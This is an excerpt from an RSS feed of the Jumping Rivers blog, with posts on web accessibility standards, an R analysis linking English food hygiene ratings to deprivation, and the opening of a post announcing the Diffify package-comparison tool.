&lt;p&gt;For more information take a look at our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-conference"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The importance of web accessibility standards</title><link>https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/</link><pubDate>Thu, 12 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our two part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/" rel="external"&gt;The importance of web accessibility standards&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;Accessibility in R applications: {shiny}&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An accessible website is more than putting content online. Making a
website accessible means ensuring that it can be used by as many people
as possible. Accessibility standards such as the &lt;a href="https://www.w3.org/WAI/standards-guidelines/wcag/" rel="external"&gt;Web Content
Accessibility Guidelines
(WCAG)&lt;/a&gt; help to
standardise the way in which a website can interact with assistive
technologies. Allowing developers to incorporate instructions into their
web applications which can be interpreted by technologies such as screen
readers helps to maintain a consistent user experience for all.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-importance-accessibility-standards-shiny-web"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="why-should-data-scientists-care"&gt;Why should data scientists care?&lt;/h2&gt;
&lt;p&gt;Data scientists often prepare web based content around data driven
insight. This might be through reports created using technologies like
{rmarkdown}, perhaps GUI front ends to expose model and data APIs built
using {flask} or {plumber}, or applications to facilitate analyses with
{shiny} or {dash}. These outputs are created with the intention of being
used by others, giving capacity to users to derive meaning and value
from data and statistical or mathematical models. My users might be key
stakeholders and decision makers at one of our clients, or indeed the
general public. Maximising the ability for my users to gain the insight
that a solution provides helps to guarantee that, as a company, we are
providing value and an impactful service.&lt;/p&gt;
&lt;p&gt;Certainly, at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, as we
build solutions for a number of public sector organisations,
consideration of accessibility criteria has become an important part of
development standards.&lt;/p&gt;
&lt;h2 id="making-my-site-accessible"&gt;Making my Site Accessible&lt;/h2&gt;
&lt;p&gt;Meeting accessibility requirements has become an increasing area of
focus for many developers. The accessibility regulations came into force
for public sector bodies in the UK in September 2018, expanding upon the
obligations to people who have a disability under the Equality Act. In
the UK alone there are almost 2 million people classed as fully or
partially blind, a further 1.5 million with a learning disability and
another 11 million with some degree of hearing loss. Implementing WCAG,
an approved ISO standard, is an excellent way of making sure that your
website is up to par.&lt;/p&gt;
&lt;h2 id="what-is-wcag"&gt;What is WCAG?&lt;/h2&gt;
&lt;p&gt;WCAG is a technical standard, primarily aimed at web developers, that provides
a set of testable guidelines arranged into 4 categories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perceivable: Content must be detectable to a user’s senses. This
might mean text alternatives for non-text content that can be read
aloud using a screen reader for people with reading difficulties,
short equivalents for images or descriptions of data represented on
a chart or diagram.&lt;/li&gt;
&lt;li&gt;Operable: Your site is comfortably navigable for users and there
isn’t any part of the site that is inaccessible to someone. Many
people do not use the mouse and rely on the keyboard to interact
with a website. This requires keyboard access to all functionality
and user interface components.&lt;/li&gt;
&lt;li&gt;Understandable: Clarity on how to use and navigate the content,
ensuring that users can process the information presented to them.
This involves things like making text readable and understandable
and making sure content appears in and operates in predictable ways.&lt;/li&gt;
&lt;li&gt;Robust: Robustness covers planning for the evolution of technology
and user changes, making sure that content remains accessible and
comprehensible to users with a range of different disabilities. The
aim is to make your site compatible with different browsers and
assistive technologies, for example, providing names, roles and
values for non-standard user interface components.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="other-benefits-of-accessibility"&gt;Other Benefits of Accessibility&lt;/h2&gt;
&lt;p&gt;Web accessibility can add value beyond making sure that your content is
able to be experienced by all.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;SEO: Many different factors contribute to search engine optimisation
(SEO), including content and user experience. Because search engine
providers want to deliver only the best results to their users,
crawlers are also interested in the user experience of your website
and rank it according to usability. Fixing accessibility issues has
the added benefit of improving SEO.&lt;/li&gt;
&lt;li&gt;Widened audience: Ultimately, people will only use and revisit
websites that they can actually use. By designing your content with
accessibility in mind, making it usable for all, you are not
restricting your site to only those that do not have difficulties
consuming content through a standard browser.&lt;/li&gt;
&lt;li&gt;Enhancing your brand: A clear commitment to accessibility highlights
a genuine sense of corporate social responsibility, helping to
protect and enhance your business’s brand.&lt;/li&gt;
&lt;li&gt;Improved mobile usability: An ever increasing number of site visits
are being made using mobile devices. For accessibility, users should
be able to magnify the screen and retain access to all of the
content. This is similar to browsing on a smaller screen, say a
smartphone.&lt;/li&gt;
&lt;li&gt;Coding standards: Designing for and implementing accessibility from
the off also encourages strict adherence to proper coding practices.
This tends to lead to cleaner, more performant and easier to
maintain code, reducing total cost over the lifespan of a website.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The link between Food Hygiene Ratings and Deprivation</title><link>https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/</link><pubDate>Thu, 05 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;If you’ve ever visited any food establishment in England &amp;amp; Wales, you’ve
probably noticed the green labels somewhere on the outside with a Food
Hygiene Rating from 0-5 on it. If you haven’t, then put simply - every
food establishment in England / Wales is required to have a food hygiene
inspection, and on the basis of this inspection is rated on a scale of
0-5, with 5 being “crack on, enjoy your dinner”, and 0 being “hmm, maybe
don’t risk it”. I explored these Food Hygiene Ratings for my Masters’
dissertation with the overarching question:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Are the ratings randomly scattered around the country and if they are
not, what are some of the variables that influence this?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="how-are-food-hygiene-ratings-calculated"&gt;How are Food Hygiene Ratings calculated?&lt;/h2&gt;
&lt;p&gt;So, how do the inspectors quantify an inspection and how are Food
Hygiene Ratings calculated? During an inspection, the establishment is
marked on three criteria:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Hygiene&lt;/strong&gt;: how well the food is being stored, prepared and cooked;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Structural&lt;/strong&gt;: the layout of the premises - inspectors are looking
for cleanliness, ventilation and pest control; and&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Management&lt;/strong&gt;: the standard of the paperwork and training - how
confident the inspectors are that the standards seen will be
maintained after the inspection.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;They are then given a score in each of the three categories. These
scores are added together to produce an &lt;em&gt;Overall Score&lt;/em&gt;, which is then
mapped to a Food Hygiene Rating.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-scores-on-the-doors-analysis"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-data"&gt;The Data&lt;/h2&gt;
&lt;p&gt;To answer the first half of our question, we need to know the scores for
all of the food establishments in the country. Thankfully, the &lt;a href="https://www.food.gov.uk/" rel="external"&gt;Food
Standards Agency&lt;/a&gt;, the organisation which
oversees the inspections, maintains an up-to-date database which
contains all the information required. They even have a section of their
website dedicated to helping users call
&lt;a href="https://api.ratings.food.gov.uk/help" rel="external"&gt;APIs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For the second half of our question, we decided to investigate whether
the Food Hygiene Ratings vary depending on how deprived an area is.
Deprivation data is available for all four nations of the UK (England,
Northern Ireland, Scotland and Wales) but each country compiles its own.
This means that the data is not comparable - the most deprived local
area in England is not necessarily equivalent to the most deprived local
area in Wales. As a result of this, we only used establishments in
England in the project.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Reproducible - shown at the bottom&lt;/em&gt;.&lt;/p&gt;
&lt;h2 id="data-exploration"&gt;Data Exploration&lt;/h2&gt;
&lt;p&gt;Let’s start by taking a look at how many establishments have each
rating:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/index_files/figure-commonmark/counts-1.svg" title="Number of eating establishments per rating." alt="Number of eating establishments per rating." width="533.333333333333" style="width:500px" class="image-center" /&gt;
&lt;p&gt;Around 75% of establishments obtain a rating of 5. This is great for
dinner, but not so great for data analysis, as there isn’t much to
differentiate between establishments. It might also be helpful to know
the different types of establishments, and how many there are in each
category:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th style="text-align: left;"&gt;Type of Establishment&lt;/th&gt;
&lt;th style="text-align: right;"&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Restaurant/Cafe/Canteen&lt;/td&gt;
&lt;td style="text-align: right;"&gt;94494&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Retailers - other&lt;/td&gt;
&lt;td style="text-align: right;"&gt;68864&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Takeaway/sandwich shop&lt;/td&gt;
&lt;td style="text-align: right;"&gt;44631&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Other catering premises&lt;/td&gt;
&lt;td style="text-align: right;"&gt;42954&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Pub/bar/nightclub&lt;/td&gt;
&lt;td style="text-align: right;"&gt;41004&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Caring Premises&lt;/td&gt;
&lt;td style="text-align: right;"&gt;31736&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;School/college/university&lt;/td&gt;
&lt;td style="text-align: right;"&gt;25742&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Mobile caterer&lt;/td&gt;
&lt;td style="text-align: right;"&gt;17404&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Hotel/bed &amp;amp; breakfast/guest house&lt;/td&gt;
&lt;td style="text-align: right;"&gt;12440&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Retailers - supermarkets/hypermarkets&lt;/td&gt;
&lt;td style="text-align: right;"&gt;11237&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Manufacturers/packers&lt;/td&gt;
&lt;td style="text-align: right;"&gt;4845&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Distributors/Transporters&lt;/td&gt;
&lt;td style="text-align: right;"&gt;1194&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Farmers/growers&lt;/td&gt;
&lt;td style="text-align: right;"&gt;478&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Importers/Exporters&lt;/td&gt;
&lt;td style="text-align: right;"&gt;178&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="visualising-the-data"&gt;Visualising the Data&lt;/h2&gt;
&lt;p&gt;We’re interested in whether Food Hygiene Ratings are randomly scattered
across the country, so it would be useful to view the data as a map.
However, looking at the numbers of establishments above, it’s very clear
that it is neither useful nor feasible to plot every single
establishment individually - we would just be colouring in a map of
England. We need some way of grouping the data, and while there are
obviously a number of different ways to do this, we chose to use
postcode districts.&lt;/p&gt;
&lt;p&gt;In the UK, most postcodes are of the form LLNN NLL (where L denotes a
letter, N a number). The first group of letters indicates the postcode
area and is normally fairly intuitive. For example, all postcodes in
the &lt;strong&gt;NE&lt;/strong&gt;wcastle upon Tyne area start with &lt;strong&gt;NE&lt;/strong&gt;. The first group of
numbers indicates the postcode district. For example, the city centre of
Newcastle upon Tyne is NE1.&lt;/p&gt;
&lt;p&gt;By extracting both the postcode area and postcode district from the full
postcode we were able to group establishments by postcode district and
then simply calculate the mean of the &lt;strong&gt;Ratings&lt;/strong&gt;.&lt;/p&gt;
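&lt;p&gt;As a minimal sketch of this grouping step, assuming a data frame with one row per establishment: the postcodes and ratings below are made up for illustration, and the column names (&lt;code&gt;postcode&lt;/code&gt;, &lt;code&gt;rating&lt;/code&gt;) are assumptions rather than the names used in the original analysis.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical example data: these postcodes and ratings are made up
establishments = data.frame(
  postcode = c(&amp;#34;NE1 4LP&amp;#34;, &amp;#34;NE1 7RU&amp;#34;, &amp;#34;NE12 8ET&amp;#34;, &amp;#34;M1 1AE&amp;#34;, &amp;#34;SW1A 1AA&amp;#34;),
  rating = c(5, 3, 4, 5, 4)
)

# The outward code is everything before the space
outward = sub(&amp;#34; .*$&amp;#34;, &amp;#34;&amp;#34;, establishments$postcode)

# Postcode area: the leading letters, e.g. NE
establishments$area = sub(&amp;#34;^([A-Z]+).*$&amp;#34;, &amp;#34;\\1&amp;#34;, outward)

# Postcode district: the area plus the digits that follow, e.g. NE1
establishments$district = sub(&amp;#34;^([A-Z]+[0-9]+).*$&amp;#34;, &amp;#34;\\1&amp;#34;, outward)

# Mean rating per postcode district
district_means = aggregate(rating ~ district, data = establishments, FUN = mean)
district_means
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note that this sketch drops any trailing letter from the outward code, so a London postcode such as SW1A 1AA is grouped under the district SW1. Whether the original analysis handled such postcodes in the same way is not stated here.&lt;/p&gt;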
&lt;p&gt;The associated postcode shapefiles are available on
&lt;a href="https://github.com/missinglink/uk-postcode-polygons/tree/master/geojson" rel="external"&gt;GitHub&lt;/a&gt;.
Importing these into R and merging with the postcode district values
gives us a nice data set that we can then plot onto a map. Using
{leaflet}, we generated the following choropleth map.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/index_files/figure-commonmark/visualise-1.png" title="Geographical distribution of Food Hygiene Ratings." alt="Geographical distribution of Food Hygiene Ratings." width="672" /&gt;
&lt;p&gt;It looks like the areas of lower ratings seem to coincide with city
centres/urban areas (look at London, Manchester, Birmingham, Liverpool,
Newcastle - these areas are considerably more “yellowy-red” than other
areas). We can probably come up with many reasons why this might be the
case. One possibility is that city centres may attract different types
of establishments than rural areas which then in turn are linked to
having lower ratings - city centre takeaways probably score lower than
countryside guest houses. Another possibility is that deprivation is
playing some part in the geographical spread of ratings; 12% of people
living in urban areas live in an area that is in the top 10% most
deprived areas, whereas this drops to only 1% of people when we consider rural
areas. This seems worth investigating.&lt;/p&gt;
&lt;h2 id="modelling-with-deprivation-data"&gt;Modelling with Deprivation Data&lt;/h2&gt;
&lt;p&gt;To investigate this potential link, we needed to implement regression
techniques, meaning that we needed to create a data set with
establishments and their corresponding deprivation data. Deprivation
data is collated and made available fairly regularly; we used the data
published in
&lt;a href="https://www.gov.uk/government/statistics/english-indices-of-deprivation-2019" rel="external"&gt;2019&lt;/a&gt;.
England is split up into small areas called LSOAs for purposes such as
the census and deprivation data. There are 32,844 LSOAs in England and
each LSOA is given a deprivation score which is made up from seven
different factors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Income Deprivation&lt;/li&gt;
&lt;li&gt;Employment Deprivation&lt;/li&gt;
&lt;li&gt;Education, Skills and Training Deprivation&lt;/li&gt;
&lt;li&gt;Health Deprivation and Disability&lt;/li&gt;
&lt;li&gt;Crime&lt;/li&gt;
&lt;li&gt;Barriers to Housing and Services&lt;/li&gt;
&lt;li&gt;Living Environment Deprivation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In each of the seven criteria, LSOAs are given higher scores for
performing worse. The most deprived LSOA in England is Tendring, Essex
with a score of 92.735 and the least deprived LSOA in England is
Chiltern, Buckinghamshire with a score of 0.541.&lt;/p&gt;
&lt;p&gt;We can combine the deprivation and the food hygiene data via their
postcode. Using ordinal regression, we can model the relationship
between deprivation data and ratings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;estDepMerged &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;readRDS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/estDepMerged.rds&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; MASS&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;polr&lt;/span&gt;(formula &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(rating) &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; `Index of Multiple Deprivation (IMD) Score`,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; estDepMerged)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# MASS::polr(formula = factor(rating) ~ `Index of Multiple Deprivation (IMD) Score`, &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# data = estDepMerged)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# `Index of Multiple Deprivation (IMD) Score` &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -0.01185 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Intercepts:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 0|1 1|2 2|3 3|4 4|5 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -6.911 -4.417 -3.671 -2.422 -1.266 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Residual Deviance: 589111.36 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# AIC: 589123.36 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This model allows us to estimate the chance of picking a restaurant with
a top hygiene rating based on the location, i.e. deprivation. For the
wealthiest regions, the chance of picking an establishment with a
rating of 5 is around 0.78. If we include 4’s &amp;amp; 5’s, this probability
rises to 0.92. For establishments at the other end of the spectrum,
the probability of a rating of 5 is only 0.54. Including 4’s &amp;amp; 5’s
increases this probability to 0.79.&lt;/p&gt;
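&lt;p&gt;These probabilities can be recovered by hand from the printed coefficients. The sketch below assumes that the two ends of the spectrum correspond to the least and most deprived LSOA scores quoted earlier (0.541 and 92.735); that choice is an assumption, although it does give figures in line with those above. It relies on the parameterisation used by &lt;code&gt;MASS::polr()&lt;/code&gt;, where the log-odds of a rating at or below k are the k-th intercept minus the coefficient times the deprivation score.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Coefficient and intercepts copied from the model output above
beta = -0.01185
zeta = c(&amp;#34;0|1&amp;#34; = -6.911, &amp;#34;1|2&amp;#34; = -4.417, &amp;#34;2|3&amp;#34; = -3.671,
         &amp;#34;3|4&amp;#34; = -2.422, &amp;#34;4|5&amp;#34; = -1.266)

# Assumed inputs: IMD scores of the least and most deprived LSOAs
imd = c(least_deprived = 0.541, most_deprived = 92.735)

# polr: logit P(rating at or below k) = zeta_k - beta * x
# P(rating of 5) = 1 - P(rating at or below 4)
p_5 = 1 - plogis(zeta[&amp;#34;4|5&amp;#34;] - beta * imd)

# P(rating of 4 or 5) = 1 - P(rating at or below 3)
p_4_or_5 = 1 - plogis(zeta[&amp;#34;3|4&amp;#34;] - beta * imd)

round(rbind(p_5, p_4_or_5), 2)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With the fitted model object to hand, &lt;code&gt;predict(model, newdata, type = &amp;#34;probs&amp;#34;)&lt;/code&gt; should give the full set of rating probabilities without the manual arithmetic.&lt;/p&gt;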
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Despite the overwhelming number of high food hygiene ratings (which,
again, I am not complaining about as far as dinner is concerned), we
were still able to see some interesting (read, concerning) patterns in
the hygiene rating locations. There is a clear link between deprivation
scores and food hygiene ratings, which we can see in the above
percentages alongside the colour coded map - you are much more likely to
encounter an establishment with a rating of five in the least deprived
areas than in the most deprived.&lt;/p&gt;
&lt;p&gt;We acknowledged earlier that there is also a difference in the type of
establishment in the different locations, but perhaps this is just more
of the same story? Yes there are different types of establishments in
different locations, but why is that? It isn’t a huge leap to suggest
that this is also related to the deprivation level of the location. In
fact, when we investigated further, we found that deprived areas not
only had a large number of takeaways, but these takeaways tended to
score lower (on average) in terms of food hygiene.&lt;/p&gt;
&lt;h2 id="futher-information"&gt;Further information&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;All code is available at our &lt;a href="https://github.com/jumpingrivers/blog/" rel="external"&gt;GitHub
Repo&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;This work was initially carried out by &lt;a href="http://maths.dept.shef.ac.uk/maths/staff_info_987.html" rel="external"&gt;James
Salsbury&lt;/a&gt; as
part of his MMathStat project at Newcastle University. James is now
a PhD student at the University of Sheffield looking at Bayesian
experimental design for adaptive clinical trials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify</title><link>https://www.jumpingrivers.com/blog/diffify-launch/</link><pubDate>Fri, 29 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-launch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-launch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-launch/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;You know that sinking feeling that you get when you&amp;rsquo;re months into a big project and you log in one day and nothing works? Turns out something has updated and things have been removed that you needed and now you need to spend hours-days figuring out what&amp;rsquo;s changed and your masters deadline is getting closer and &amp;hellip; ok, apparently this took me back to a very specific event.&lt;/p&gt;
&lt;p&gt;But I&amp;rsquo;m sure &lt;em&gt;most&lt;/em&gt; of that sounds familiar to you if you&amp;rsquo;ve ever programmed something over a longer period of time.&lt;/p&gt;
&lt;p&gt;Over the last few months, &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; have been working on a tool that will make it easier to see differences between R package versions: &lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With &lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt;, you can compare versions of R packages at the click of a button. This post will give a quick overview of the tool&amp;rsquo;s features and how to use them.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-launch"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-diffify"&gt;What is Diffify?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt; provides you with a comparison between different versions of any R package stored on CRAN. Say you were using a particular version of a package in a project and now a new version of that package is available. With Diffify you are easily able to check what has been changed in the new release. This allows you to determine how updating the package will affect your current code. In particular, Diffify gives you information from the News file, as well as changes in the dependencies, namespace and functions of the package.&lt;/p&gt;
&lt;h2 id="how-can-i-compare-versions"&gt;How can I compare versions?&lt;/h2&gt;
